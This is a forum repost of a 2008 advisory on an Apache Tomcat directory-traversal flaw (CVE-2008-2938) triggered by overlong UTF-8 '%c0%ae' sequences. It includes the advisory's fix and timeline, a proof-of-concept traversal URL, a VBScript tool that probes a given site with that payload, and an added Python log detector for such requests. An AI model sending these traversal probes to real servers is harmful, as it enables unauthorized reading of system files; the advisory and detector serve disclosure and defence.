jxwjq posted on 2017-1-12 10:27:34

Apache Tomcat UTF-8 encoding vulnerability [reposted from 邪恶八进制 (EvilOctal)]

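  A vulnerability similar to the old IIS URL-encoding bug has turned up in Apache Tomcat. It occurs because Apache Tomcat does not convert correctly when handling UTF-8 encoding, so a URL containing %c0%ae%c0%ae is converted into something like ../, which makes it possible to traverse arbitrary files on the system, including /etc/passwd and the like.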

The condition for triggering it is that 'allowLinking' is enabled and 'URIencoding' allows 'UTF-8' in Apache Tomcat's configuration file context.xml or server.xml.
  Title: Apache Tomcat Directory Traversal Vulnerability
  Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com)
  Severity: High
  Impact: Remote File Disclosure
  Vulnerable Version: prior to 6.0.18
  Solution:
  - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
  - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.
  - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.
  References:
  - http://tomcat.apache.org/security.html
  - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
  History:
  - 07.17.2008: Initiate notify (To Apache Security Team)
  - 08.02.2008: Responded this problem fixed and released new version
  - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)
  - 08.10.2008: Responded with some suggestions.

  Description
  As Apache Security Team, this problem occurs because of JAVA side.
  If your context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8', an attacker can obtain your important system files. (e.g. /etc/passwd)

  Exploit
  If your webroot directory has three depth (e.g. /usr/local/wwwroot), an attacker can access arbitrary files as below. (Proof-of-concept)
  http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar

  # milw0rm.com
  VBS test version:
  Dim strUrl, strSite
  showB()

  ' Expect exactly one argument: the base URL of the site to test
  Set Args = Wscript.Arguments
  If Args.Count <> 1 Then
      ShowU()
  Else
      strSite = Args(0)
  End If

  ' Path from the advisory's proof-of-concept
  strUrl = "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"
  Set objXML = CreateObject("Microsoft.XMLHTTP")
  objXML.Open "GET", strSite & strUrl, False
  objXML.SetRequestHeader "Referer", strSite
  objXML.send()

  ' An HTTP 200 response is reported as "存在漏洞" ("vulnerable")
  If objXML.status = 200 Then
      Wscript.Echo("存在漏洞")
  End If

  ' Banner
  Sub showB()
      With Wscript
          .Echo("+--------------------------=====================------------------------------+")
          .Echo("Exploit Apache Tomcat UTF-8")
          .Echo("Code By Safe3")
          .Echo("+--------------------------=====================------------------------------+")
      End With
  End Sub

  ' Usage text ("用法" = usage, "例子" = example), then exit
  Sub showU()
      With Wscript
          .Echo("+--------------------------=====================------------------------------+")
          .Echo("用法:")
          .Echo(" cscript " & .ScriptName & " site")
          .Echo("例子:")
          .Echo(" cscript " & .ScriptName & " http://www.example.com >result.txt")
          .Echo("+--------------------------=====================------------------------------+")
          .Quit
      End With
  End Sub
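The overlong-encoding behaviour described above, seen from the detection side, as an added example that is not part of the original post or the advisory: it finds overlong UTF-8 sequences in a percent-encoded request path, shows what a decoder without a shortest-form check would turn them into, and flags access-log lines where that result contains a `..` segment. It generalizes slightly beyond the page's `%c0%ae` case by also covering three-byte overlong forms; the log lines are constructed samples and all function names are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Aug/2008:12:00:01 +0000] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar HTTP/1.1" 200 512',
    '198.51.100.8 - - [10/Aug/2008:12:00:02 +0000] "GET /docs/%E4%B8%AD%E6%96%87.html HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Aug/2008:12:00:03 +0000] "GET /index.jsp HTTP/1.1" 200 100',
]

def overlong_spans(raw):
    """Yield (offset, length, code point) for each overlong 2- or 3-byte UTF-8 sequence."""
    i = 0
    while i < len(raw):
        nxt = raw[i + 1:i + 3]
        # Lead bytes 0xC0/0xC1 only ever encode code points below 0x80 (e.g. C0 AE -> '.').
        if raw[i] in (0xC0, 0xC1) and len(nxt) >= 1 and nxt[0] & 0xC0 == 0x80:
            yield i, 2, ((raw[i] & 0x1F) << 6) | (nxt[0] & 0x3F)
            i += 2
        # 0xE0 followed by 0x80-0x9F encodes a code point below 0x800: also overlong.
        elif raw[i] == 0xE0 and len(nxt) == 2 and 0x80 <= nxt[0] <= 0x9F and nxt[1] & 0xC0 == 0x80:
            yield i, 3, ((nxt[0] & 0x3F) << 6) | (nxt[1] & 0x3F)
            i += 3
        else:
            i += 1

def lenient_decode(raw):
    """Decode the way a decoder without a shortest-form check would."""
    out, pos = [], 0
    for off, length, cp in overlong_spans(raw):
        out += [raw[pos:off].decode("utf-8", "replace"), chr(cp)]
        pos = off + length
    return "".join(out) + raw[pos:].decode("utf-8", "replace")

def inspect_path(path):
    """Summarize overlong sequences in a percent-encoded path and their lenient decoding."""
    raw = unquote_to_bytes(path)
    decoded = lenient_decode(raw)
    return {"overlong": len(list(overlong_spans(raw))), "lenient": decoded,
            "traversal": ".." in decoded.split("/")}

def flag_lines(lines):
    """Return (client, path) for requests whose path hides '..' behind overlong bytes."""
    hits = []
    for line in lines:
        m = re.match(r'(\S+) .*?"[A-Z]+ (\S+) HTTP', line)
        info = inspect_path(m.group(2)) if m else {}
        if info.get("overlong") and info.get("traversal"):
            hits.append((m.group(1), m.group(2)))
    return hits
```

A strict decoder (Python's own `bytes.decode("utf-8")`, for instance) rejects `0xC0 0xAE` outright, which is why legitimate multi-byte paths such as the second sample line are not flagged.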